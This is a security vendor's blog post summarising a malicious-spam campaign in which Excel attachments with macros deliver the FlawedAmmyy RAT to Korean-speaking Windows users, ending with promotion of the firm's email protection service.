Always be cautious while opening email attachments. Recently, hackers have been sending weaponized Excels containing malicious malware FlawedAmmyy RAT, reported by researchers. When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory,” Microsoft notes in a thread about the threat.
The malicious executable then downloads and decrypts a file called wsus.exe that’s designed to be passed off as the official Microsoft Windows Service Update Service (WSUS). The executable file was digitally signed on June 19 and decrypts the payload in RAM, delivering the FlawedAmmyy payload.
This particular attack appears aimed at Korean-speaking Windows users due to the attachment including Korean-language characters.
And it has been designed to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats. Directly making any end user open such executable file is challenging for the hackers, so they embed these into simpler email attachments like Excel and Word files which people feel are harmless and always click them.
According to security firm Proofpoint, a group called TA505 is responsible for the mass distribution of malicious spam campaigns is being exploited to spread FlawedAmmyy RAT.
Microsoft says that its Threat Protection defends customers from this attack. “Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign,” the company notes.
Advanced Threat Protection is a must in order to avoid such attacks. Logix Infosecurity deploys latest email security and advanced threat protection software so that the critical confidential data stays safe. We work on continuously updating the software as cyber criminals are changing their methods. Our Cloud Email Advance Threat Protection service accurately detects email-borne threats such as Ransomware, BEC, Domain Spoofing, Advanced Malware, Spear Phishing & Display Name Spoofing. Security being an evolving process, you must always keep abreast with the latest trends and updates.